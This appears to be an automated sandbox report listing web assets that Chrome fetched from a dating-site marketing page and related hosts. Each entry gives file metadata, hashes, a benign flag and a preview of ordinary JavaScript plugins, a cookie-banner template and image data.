                                                                                                                                                                                                                                                                                URL:https://p.typekit.net/p.gif?s=2&k=646866_65ddde819292aa47ed2c6d1d&ht=tk&h=www.spark.net&f=34661.34669.34662.34670&a=646866&js=1.21.0&app=typekit&e=js&_=1728225770895
                                                                                                                                                                                                                                                                                Preview:GIF89a.............,..............;
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16422
                                                                                                                                                                                                                                                                                Entropy (8bit):4.582238084395129
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:jwgBAnF1UclxkxsE5QAvXMZQfeVemfeDNWSkr5+3LiBZGKCVemkeTd5/7x:jwgBAnqZNWSaKd5/7x
                                                                                                                                                                                                                                                                                MD5:C438E14F00765983D9D40C71C6856926
                                                                                                                                                                                                                                                                                SHA1:A37898CCE970FE50A7814384CDEE7A12D00E078F
                                                                                                                                                                                                                                                                                SHA-256:167C030ABF8B8CB9FC0717747FA0398EF0261262CCABF0F149C2F6E4A457361A
                                                                                                                                                                                                                                                                                SHA-512:0D22BC3E324801489574AACD4318C02C8A56C5C3512972117D8AA4E06D2602A48A6D9AAC532D5929C2FD6DACB05A3C8568A09DBDBF0546AADD4C0EC8F5B9E3E7
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:(function($) {. $.tm_pb_simple_carousel = function(el, options) {. var settings = $.extend( {. slide_duration.: 500,. }, options );.. var $tm_carousel ...= $(el),. $carousel_items ..= $tm_carousel.find('.tm_pb_carousel_items'),. $the_carousel_items .= $carousel_items.find('.tm_pb_carousel_item');.. $tm_carousel.tm_animation_running = false;.. $tm_carousel.addClass('container-width-change-notify').on('containerWidthChanged', function( event ){. set_carousel_columns( $tm_carousel );. set_carousel_height( $tm_carousel );. });.. $carousel_items.data('items', $the_carousel_items.toArray() );. $tm_carousel.data('columns_setting_up', false );.. $carousel_items.prepend('<div class="tm-pb-slider-arrows"><a class="tm-pb-slider-arrow et-pb-arrow-prev" href="#">' + '<span>' + tm_pb_custom.previous + '</span>' + '</a><a class="tm-pb-slider-arrow et-pb-arrow-next" href="#">' + '<span>' + tm_pb_custom.next + '</span>' + '</a></div>');.. set_caro
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):9585
                                                                                                                                                                                                                                                                                Entropy (8bit):5.414844715176509
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:kcR6M4H08DRXzBIHi3ux0i/DtwfJpYtOJYw/c3ODM4xRw+/p5Uf1CEdVf0P/qbgn:kc/sVi1aawc0
                                                                                                                                                                                                                                                                                MD5:8355E247DDC36EA97C187FEF0216D909
                                                                                                                                                                                                                                                                                SHA1:9DE2A25E64D0499F8B2632FED909C7C6F65EEE55
                                                                                                                                                                                                                                                                                SHA-256:ACD83F5FB8B117401003F7311747B0CF18EC7D55551CE776FE65A3869FC06A93
                                                                                                                                                                                                                                                                                SHA-512:395947A03F6EFB7E4F65F91D4738EC18B120BF122489C29CC4186FE2BB4A19E9E35D369D02FFC3C210CFCEABCB8DA8EF44A28659557CCEDA30123E000428D17C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:. {. "name": "otFloatingRoundedCorner",. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90RmxvYXRpbmdSb3VuZGVkQ29ybmVyIj48ZGl2IGNsYXNzPSJvdC1zZGstY29udGFpbmVyIiByb2xlPSJkaWFsb2ciIGFyaWEtZGVzY3JpYmVkYnk9Im9uZXRydXN0LXBvbGljeS10ZXh0Ij48ZGl2IGNsYXNzPSJvdC1zZGstcm93Ij48ZGl2IGlkPSJvbmV0cnVzdC1ncm91cC1jb250YWluZXIiIGNsYXNzPSJvdC1zZGstdHdlbHZlIG90LXNkay1jb2x1bW5zIj48ZGl2IGlkPSJvbmV0cnVzdC1wb2xpY3kiPjxkaXYgY2xhc3M9ImJhbm5lci1oZWFkZXIiPjxkaXYgY2xhc3M9ImJhbm5lcl9sb2dvIj48L2Rpdj48L2Rpdj48aDMgaWQ9Im9uZXRydXN0LXBvbGljeS10aXRsZSI+VGhpcyBzaXRlIHVzZXMgY29va2llczwvaDM+PHAgaWQ9Im9uZXRydXN0LXBvbGljeS10ZXh0Ij5XZSB1c2UgY29va2llcyB0byBpbXByb3ZlIHlvdXIgZXhwZXJpZW5jZSwgdG8gcmVtZW1iZXIgbG9nLWluIGRldGFpbHMsIHByb3ZpZGUgc2VjdXJlIGxvZy1sb2dpbiwgY29sbGVjdCwgdG8gb3B0aW1pemUgc2l0ZSBmdW5jdGlvbmFsaXR5LCBhbmQgZGVsaXZlciBjb250ZW50IHRhaWxvcmVkIHRvIHlvdXIgaW50ZXJlc3QuIDxhIGhyZWY9IiMiPkxlYXJuIE1vcmU8L2E+PC9wPjxkaXYgY2xhc3M9Im90LWRwZC1jb250YWluZXIiPjxoMyBjbGFzcz0ib3QtZHBkL
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 750 x 466, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):531253
                                                                                                                                                                                                                                                                                Entropy (8bit):7.994626581713174
                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                SSDEEP:12288:1TbYNVQIf8byKxumTnDDn4bdf7mHGCUFZ4:tbYFUbyKZDni7K
                                                                                                                                                                                                                                                                                MD5:50BF7F5DECD33408DE0A16CC681377EF
                                                                                                                                                                                                                                                                                SHA1:13670A2A891372D9AAA13A6C9D772E7F194BAF25
                                                                                                                                                                                                                                                                                SHA-256:E967910D6AFCB8867E33F975859A9211084E56D68A395A27EEBD845A93F5C86E
                                                                                                                                                                                                                                                                                SHA-512:5FB1A258250FAB622C44BAAAF81ABB75D164208F8F2BC6FDDC4409EC2D4FF846067345AD87ED12F64EEA4922E8A5C7EBF05132B0958EA69117ABC9369DE2A4A2
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR..............MN.....pHYs............... .IDATx..Y.mIv..e....w.[]..c..[%...nk.Y22..n. .. ...B~......0/...p`..<.@.;$....0D...K.,..[..5....{..!.....}...Z.......+Wf....s...L....Z.h....3......9..O..!@....e|..\..C... ..}z..T.}.Ep~H......h...s..6.R&UG..(..'+........s.EGc...y..LJ,.[...|...W."6.-...B@.;.B.sw.%.>.)..R*:O...i.!.....w|Q.....R*.Oy...'...P.!_T..o..wL.)........1fIK)#..............!';N.B.h. .....''+J35'......u.h.G..,{.L...P.....A@8.(.E....^8'E.VI.........t....>.....%m...r....A+H!#..<..~.ku.....!.TT...o.s}....t<.c..*..w}..mNG....%.....Bt...)M.r...U.b..GZ..<...G..1m.0.........)....0.0..2..?..8...;...=N.....h.6i..Qk....Z?l...Ld...............o|c.-....B.m.6.....!....Z.GGj.._......g.~..B.......A....Fp...B.<E...7...A.y...}u.....)..wS0...m..n.>.`?.....wlx.7sX..tw.(.P..`.a.Q......>..M.!P.2.=.....!@6%..h.1..C..<.)$...m....!.<.0C:).....m.^./;Z..k.Q...W.........!.Y .....D.X....E.........r.........B.m...3.....urU.=GCk.........N..X9..e
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):8039
                                                                                                                                                                                                                                                                                Entropy (8bit):4.9319682401839025
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:BveNZjltWdPROpGiOtgFGKfkhmOAssUHfqkXPpbrhM:9eN8BEUhBICc
                                                                                                                                                                                                                                                                                MD5:950254FCF355BCD9EC7231F852422A80
                                                                                                                                                                                                                                                                                SHA1:C08E5150B4505ADD53848B96E6513AB526C60387
                                                                                                                                                                                                                                                                                SHA-256:291A147C07C7CC6863AB346392DA3EC7CED127FF01849BDACC6EF06C317D6634
                                                                                                                                                                                                                                                                                SHA-512:ADFC19406D2DB03D28259E8964084A4F4B3C93C5FA2318284A1C61E668FFF7B3A45973E35AC9DEAB325B94A7CC36ACC6902841AC220DBE834F56BC77DFB8B0D0
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/plugins/tm-mega-menu/public/assets/js/script.min.js?ver=1.1.2
                                                                                                                                                                                                                                                                                Preview:( function( $ ) {..'use strict';.../*.. * debouncedresize: special jQuery event that happens once after a window resize.. *.. * latest version and complete README available on Github:.. * https://github.com/louisremi/jquery-smartresize.. *.. * Copyright 2012 @louis_remi.. * Licensed under the MIT license... */..var $event = $.event,...$special,...resizeTimeout;..$special = $event.special.debouncedresize = {...setup: function() {....$( this ).on( 'resize', $special.handler );...},...teardown: function() {....$( this ).off( 'resize', $special.handler );...},...handler: function( event, execAsap ) {....// Save the context....var context = this,.....args = arguments,.....dispatch = function() {......// set correct event type......event.type = 'debouncedresize';......$event.dispatch.apply( context, args );.....};....if ( resizeTimeout ) {.....clearTimeout( resizeTimeout );....}....if ( execAsap ) {.....dispatch();....} else {.....resizeTimeout = setTimeout( dispatch, $special.threshold );..
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 678 x 182, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):24296
                                                                                                                                                                                                                                                                                Entropy (8bit):7.933020929555668
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:nCh/biUlxYpd1gtl8Ls5KKV/H2aIAo1KeQVSpDne7kzQGWIgbArQsw4d5iPMTMfH:0biUMdmtlasYKV+PAsKmTokzQGHAktwt
                                                                                                                                                                                                                                                                                MD5:5BC93528FDCBED8E4755A169A3CD7E4A
                                                                                                                                                                                                                                                                                SHA1:CC71740481D90B2CA0D17FDCB3A96E0DFB4CD0EC
                                                                                                                                                                                                                                                                                SHA-256:28A23FFBD983A60B0F0660352F16D905061FDD83B2106E865EBE0C58AA66DAB8
                                                                                                                                                                                                                                                                                SHA-512:91B2C4605654453A587C5050F51DA74194241ED65EF358317C6E636B0E34E558F8EB8DABD1D30486BE1603654C7157366DB7A146603E296145F0AC1A9C671B58
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://uploads.codesandbox.io/uploads/user/cb07091a-9803-4eab-aa81-fd133653f44b/fjLo-hhcap.png
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR..............P.z...ViCCPicc..x..wX.....g$!..A@F.K..CF.+..!.JH...cHPq.R...Q.hU...H..Z.R..u...TjQ......g....<..<.s_...{.9.&....h..I$..&@.X&M..fMLKg....F.&...._$a..E.2....... ..4...;......X..,A...q3.../.........d.. ............,....IJ. n.PQ..9..w..*.....G.".....c...sy.......N..J.v._....w.g1s._....<^....0..Q...7...VX .+....\iD.`.....iQ....G....X.....@.8#W......E.t...]...(.....1.J=+[..E..x.H.MBl.x..(4Q.]:-Ay.^.-..y..@y.=y~2[..E....O...&."f .*... VG.\......_.........[!N......liX....h.^b{.....C...E..3|.P....bv.p.a....Z..PE....89Q..D....K2$.qJ..BX.>.[ v/*NT.%Sd.$.....Y\."O.$.....\.....`...,..y j.i...r%.x .....B..:."F.D(.?...hd_......aXU>. {h.xhG><B\.QP.B.........#E..yh.Q..h........).JE>|"Kc..J..FP.....@.......+.M.......Ay@.F..*Z$."....re....y/H....&.Qt...'...tG..@t..R9.Q._....>......G..v_.TwP...^...e.Y.......s>...Q_z.K...9..q.8F4..8I4...q.#......9-a(.|.G.....N...t..W..3e..3M2K*...... dq.|.1,W.WW..w....x...~......r``..OZ.I....G?iv..Z
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):59
                                                                                                                                                                                                                                                                                Entropy (8bit):4.458251523644761
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:2LGf/KXLGAXHmrG6H099Mwn:2LG6yA8H0gw
                                                                                                                                                                                                                                                                                MD5:DBE4544ED8001CB7AC103DF5E26A3DE2
                                                                                                                                                                                                                                                                                SHA1:7F1B70E1285013BAD305FFCCDCD1E8A408F04950
                                                                                                                                                                                                                                                                                SHA-256:3B77E27435FA39301FCABC232A2D66E05D5D00932FF222CDD2078ECAA4619155
                                                                                                                                                                                                                                                                                SHA-512:1585465049639898CC8830E4CD03791185E52F1E7E48C70C2D547C27EC2285DC7DE4B1060CABDD9EF1AEFFC25246A3DA75BE2CE0541E6ED1D32412054CB58BCE
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:(function($){..jQuery.fn.reverse = [].reverse;.}(jQuery));.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 225 x 225, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):786
                                                                                                                                                                                                                                                                                Entropy (8bit):7.315632491951197
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:KDaMW3IEnvXGPSt7bH/udDcB6antryQQFK:0lOv2EfQQQo
                                                                                                                                                                                                                                                                                MD5:A250B7C67EC7A5E552C7A6DDE64B01C4
                                                                                                                                                                                                                                                                                SHA1:248B99A7A83B5BCFCB6DF8A8EB2A08722BB4FCF2
                                                                                                                                                                                                                                                                                SHA-256:2623C12E9C49D05E9D10CC35E4D336A0C8AAD48DE4CD49CD04E6475DD3E1ABDF
                                                                                                                                                                                                                                                                                SHA-512:4C6B92A9C399931F9F177446E148B09FC60E9C96056B5E2F2B47026C4010724EB4F718DFA38C710D72E89AE1BC23D63F0C77079FAF7F0D414CAB3B5EEF04564E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR..............m"H...oPLTE...........................................yyy<<<......444...........\\\......ooo%%%ggg;;; GGGFFF,,,...QQQCB.....^IDATx....r.@.FaB.,@` `l..%...Y.*.M.).....O..f.................~.N.....i...[4.......rZ.~..........>...>......x...TP..-...-\...,<g.J.n..dd..9....@..K^.`.....@..}.oY+.b.)7P..P{a..T....Vx.N.....[F.....v.k.w3..........yx7.w..06.].l>..:^Bk..'z6.Fa.hN..|...>z4'....L)....E..$]....I..g.hN(.G.>..}.....Q......0K.>...o..GtHR.%.stH.W.gtH.W...$..mtG.Sa...N..."N...4....:....:..6..i>.]..Sa..a.)<Dg.|.K>..)\Dg.|..^...K...K..-:..S.]aq),y9.),x..Tx.......+,....&.~6.M.l.../.........x23....w.,y...B}..P...(.G.>..Q..B}..P...(.G.>..Q..B}..P...(.G.>..Q..B}..P...(.W..k.u..;................_t...]ZM2....IEND.B`.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (20087), with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):20219
                                                                                                                                                                                                                                                                                Entropy (8bit):5.340030935431211
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:iPhVPXQ2G2XAQyqVxRQ5giCCMLtA15h5/F6l8aZwHwztLCpmst:iPBIt8I5h5t1qkOLCMst
                                                                                                                                                                                                                                                                                MD5:B37D7EDF99565D3858EAA1AD80DF3CFF
                                                                                                                                                                                                                                                                                SHA1:786A4343711E9AF5E5DFCC493E7D2331B48875BB
                                                                                                                                                                                                                                                                                SHA-256:B0A45CD5AED66E27BD8EE861D0E3B782C8E79849BDE32F90F078B9F2451A36F2
                                                                                                                                                                                                                                                                                SHA-512:A48797BF6796AB59E1B40003C98AC999A877C8B07ADBF317B087FF49046C943A11C3922B92F228E88C1C770B1E4D80B75240C79E9958DE50FCF1FBB9C35DBD1A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/themes/monstroid2/assets/js/min/jquery.magnific-popup.min.js?ver=1.1.0
                                                                                                                                                                                                                                                                                Preview:/*! Magnific Popup - v1.1.0 - 2016-02-20..* http://dimsemenov.com/plugins/magnific-popup/..* Copyright (c) 2016 Dmitry Semenov; */..!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a("object"==typeof exports?require("jquery"):window.jQuery||window.Zepto)}(function(a){var b,c,d,e,f,g,h="Close",i="BeforeClose",j="AfterClose",k="BeforeAppend",l="MarkupParse",m="Open",n="Change",o="mfp",p="."+o,q="mfp-ready",r="mfp-removing",s="mfp-prevent-close",t=function(){},u=!!window.jQuery,v=a(window),w=function(a,c){b.ev.on(o+a+p,c)},x=function(b,c,d,e){var f=document.createElement("div");return f.className="mfp-"+b,d&&(f.innerHTML=d),e?c&&c.appendChild(f):(f=a(f),c&&f.appendTo(c)),f},y=function(c,d){b.ev.triggerHandler(o+c,d),b.st.callbacks&&(c=c.charAt(0).toLowerCase()+c.slice(1),b.st.callbacks[c]&&b.st.callbacks[c].apply(b,a.isArray(d)?d:[d]))},z=function(c){return c===g&&b.currTemplate.closeBtn||(b.currTemplate.closeBtn=a(b.st.closeMarkup.replace("%title%",b.st.tClose)),g=
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):83617
                                                                                                                                                                                                                                                                                Entropy (8bit):5.031288361913534
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:Jgei6eD8NTv11MY+lWMDF+0VYJ1X5jTpPgq7Xyeys8Fcr+:J/LeA1MNDAJ1X5XpPgq7XyeJ+
                                                                                                                                                                                                                                                                                MD5:608B0CC0974DAA19271E81D520792EB1
                                                                                                                                                                                                                                                                                SHA1:6A3B0D38CAFB5C7544D6D921DB6FF14DAD237759
                                                                                                                                                                                                                                                                                SHA-256:AA3EAC33D5E68B70F611CDF2FDC172EC5EA909C4269CB18C65C0D667658E886C
                                                                                                                                                                                                                                                                                SHA-512:E45EE74B21FE8A932DF9220EED0B7A8843B8585A88A3EBB4F0C73B845F9D6254D1BF72489D9D01424779122B393ABDDCA135E41496E11BB247D0CF61D7D7E637
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/js/scripts.js?ver=1.3.1
                                                                                                                                                                                                                                                                                Preview:var $tm_pb_slider = jQuery( '.tm_pb_slider' ),..$tm_pb_tabs = jQuery( '.tm_pb_tabs' ),..$tm_pb_tabs_li = $tm_pb_tabs.find( '.tm_pb_tabs_controls li' ),..$tm_pb_video_section = jQuery('.tm_pb_section_video_bg'),..$tm_pb_newsletter_button = jQuery( '.tm_pb_newsletter_button' ),..$tm_pb_filterable_portfolio = jQuery( '.tm_pb_filterable_portfolio' ),..$tm_pb_fullwidth_portfolio = jQuery( '.tm_pb_fullwidth_portfolio' ),..$tm_pb_gallery = jQuery( '.tm_pb_gallery' ),..$tm_pb_countdown_timer = jQuery( '.tm_pb_countdown_timer' ),..$tm_post_gallery = jQuery( '.tm_post_gallery' ),..$tm_lightbox_image = jQuery( '.tm_pb_lightbox_image'),..$tm_pb_map = jQuery( '.tm_pb_map_container' ),..$tm_pb_circle_counter = jQuery( '.tm_pb_circle_counter_bar' ),..$tm_pb_number_counter = jQuery( '.tm_pb_number_counter' ),..$tm_pb_parallax = jQuery( '.tm_parallax_bg' ),..$tm_pb_shop = jQuery( '.tm_pb_shop' ),..$tm_pb_post_fullwidth = jQuery( '.single.tm_pb_pagebuilder_layout.tm_full_width_page' ),..tm_is_mob
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (1238)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1239
                                                                                                                                                                                                                                                                                Entropy (8bit):5.068464054671174
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:ch63Cf5W8QPIHRZ3hwVFS39bYGwNef1yTZsNUkQ1sZmSuLqNWRco5Jcn5IKM6cuY:C6SQnw/x+SR8ZZkQbp1RZ5JwiKMm7Zc
                                                                                                                                                                                                                                                                                MD5:9E8F56E8E1806253BA01A95CFC3D392C
                                                                                                                                                                                                                                                                                SHA1:A8AF90D7482E1E99D03DE6BF88FED2315C5DD728
                                                                                                                                                                                                                                                                                SHA-256:2595496FE48DF6FCF9B1BC57C29A744C121EB4DD11566466BC13D2E52E6BBCC8
                                                                                                                                                                                                                                                                                SHA-512:63F0F6F94FBABADC3F774CCAA6A401696E8A7651A074BC077D214F91DA080B36714FD799EB40FED64154972008E34FC733D6EE314AC675727B37B58FFBEBEBEE
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:!function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href")||""}function r(e,t){var r=e.substr(t,2);return parseInt(r,16)}function n(n,c){for(var o="",a=r(n,c),i=c+2;i<n.length;i+=2){var l=r(n,i)^a;o+=String.fromCharCode(l)}try{o=decodeURIComponent(escape(o))}catch(u){e(u)}return t(o)}function c(t){for(var r=t.querySelectorAll("a"),c=0;c<r.length;c++)try{var o=r[c],a=o.href.indexOf(l);a>-1&&(o.href="mailto:"+n(o.href,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.querySelectorAll("template"),n=0;n<r.length;n++)try{i(r[n].content)}catch(c){e(c)}}function i(t){try{c(t),o(t),a(t)}catch(r){e(r
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (41930)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):45833
                                                                                                                                                                                                                                                                                Entropy (8bit):5.08449503679837
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:WYpA67K4HmjEjsjJKWByL5UeMVZE/1XSDSPWTrAjQfSfQjXslVMazE:64rEJKWUNtwZ61GSOTrA8fnLN
                                                                                                                                                                                                                                                                                MD5:239674CFE29903CEFA45DB4F3C6F610A
                                                                                                                                                                                                                                                                                SHA1:5C5D90EAB75C62916EF34EED7B86552465A4A787
                                                                                                                                                                                                                                                                                SHA-256:93D8973874C2ECA691E78D2D35EA93B91884936AA405E5E30275ABD620919934
                                                                                                                                                                                                                                                                                SHA-512:82CCB0456EAF134CF0AFE5B7A4B936C684084B73AEEF4667D9495742A2FEE96DDE142DB6EC40FBE3FAEDA1F4B46D8EE640A50609AC4618EC8CCACF29A4984E88
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var m={},u={};function c(e){var t=u[e];if(t!==void 0)return t.exports;var a=u[e]={id:e,loaded:!1,exports:{}};return m[e].call(a.exports,a,a.exports,c),a.loaded=!0,a.exports}c.m=m,c.amdO={},(()=>{var e=[];c.O=(t,a,n,s)=>{if(a){s=s||0;for(var f=e.length;f>0&&e[f-1][2]>s;f--)e[f]=e[f-1];e[f]=[a,n,s];return}for(var d=1/0,f=0;f<e.length;f++){for(var[a,n,s]=e[f],i=!0,b=0;b<a.length;b++)(s&!1||d>=s)&&Object.keys(c.O).every(p=>c.O[p](a[b]))?a.splice(b--,1):(i=!1,s<d&&(d=s));if(i){e.splice(f--,1);var r=n();r!==void 0&&(t=r)}}return t}})(),c.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return c.d(t,{a:t}),t},(()=>{var e=Object.getPrototypeOf?a=>Object.getPrototypeOf(a):a=>a.__proto__,t;c.t=function(a,n){if(n&1&&(a=this(a)),n&8||typeof a=="object"&&a&&(n&4&&a.__esModule||n&16&&typeof a.then=="function"))return a;var s=Object.create(null);c.r(s);var f={};t=t||[null,e({}),e([]),e(e)];for(var d=n&2&&a;typeof d=="object"&&!~t.indexOf(d);d=e(d))Object.getOwnPropertyNames(d).forEa
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):3221
                                                                                                                                                                                                                                                                                Entropy (8bit):4.968390870827016
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:eJY/EPgJA//DMlsH+dMjzdyhpKturHpg8gPVNDabOTWD0c:koEPgJATmsrTt4MVN3TBc
                                                                                                                                                                                                                                                                                MD5:3FDE640BEFFACA6853692C3A8399837F
                                                                                                                                                                                                                                                                                SHA1:B0E920EB8B0E05ABAA32C921F14FAF0D9437C8AE
                                                                                                                                                                                                                                                                                SHA-256:5A55D3DE0A725A8D09AB29A42AC534238742C459937D09D199E279EDDEEF74CA
                                                                                                                                                                                                                                                                                SHA-512:55E6A3B1F7736D01B498372716D12EB3FDC0B1DE6500B17F61A5A56C7A32F9C6F6E525C28F8CE3B72AB8537E9002FA6A6C308F43EE7F29FA65E1E44C9E719A7E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/js/libs/jquery.fitvids.js?ver=1.3.1
                                                                                                                                                                                                                                                                                Preview:/*jshint browser:true */./*!.* FitVids 1.1.*.* Copyright 2013, Chris Coyier - http://css-tricks.com + Dave Rupert - http://daverupert.com.* Credit to Thierry Koblentz - http://www.alistapart.com/articles/creating-intrinsic-ratios-for-video/.* Released under the WTFPL license - http://sam.zoy.org/wtfpl/.*.*/..;(function( $ ){.. 'use strict';.. $.fn.fitVids = function( options ) {. var settings = {. customSelector: null,. ignore: null. };.. if(!document.getElementById('fit-vids-style')) {. // appendStyles: https://github.com/toddmotto/fluidvids/blob/master/dist/fluidvids.js. var head = document.head || document.getElementsByTagName('head')[0];. var css = '.fluid-width-video-wrapper{width:100%;position:relative;padding:0;}.fluid-width-video-wrapper iframe,.fluid-width-video-wrapper object,.fluid-width-video-wrapper embed {position:absolute;top:0;left:0;width:100%;height:100%;}';. var div = document.createElement("div");. div.innerHTML = '<p>x<
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (12150)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):12323
                                                                                                                                                                                                                                                                                Entropy (8bit):5.494318505273094
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:bv4HuJvASHqjVZxtg42IzLneuc+52J++t+8/Szz/6ue+obi/OpjP8zK8biPAm7Re:bAeYz/2wLnen+yU7l7kj0k4ME
                                                                                                                                                                                                                                                                                MD5:AF70089388D2E92FA660172F1F449799
                                                                                                                                                                                                                                                                                SHA1:D12240C5CE7ABFD30074F26A5C1AC547AA6B080A
                                                                                                                                                                                                                                                                                SHA-256:4270F6608898CF342A0E14AB64F7B557CE7E5A81CB311FF5B60F8C2A3291C015
                                                                                                                                                                                                                                                                                SHA-512:89C15B99B97777BD7810D34F41B95D2ADC517A6FA6EFB6354A2237DE59476C43907482BEF2233BD13AB5796DBE05B363C007DA22AB5473BE628CF53C187D7C34
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
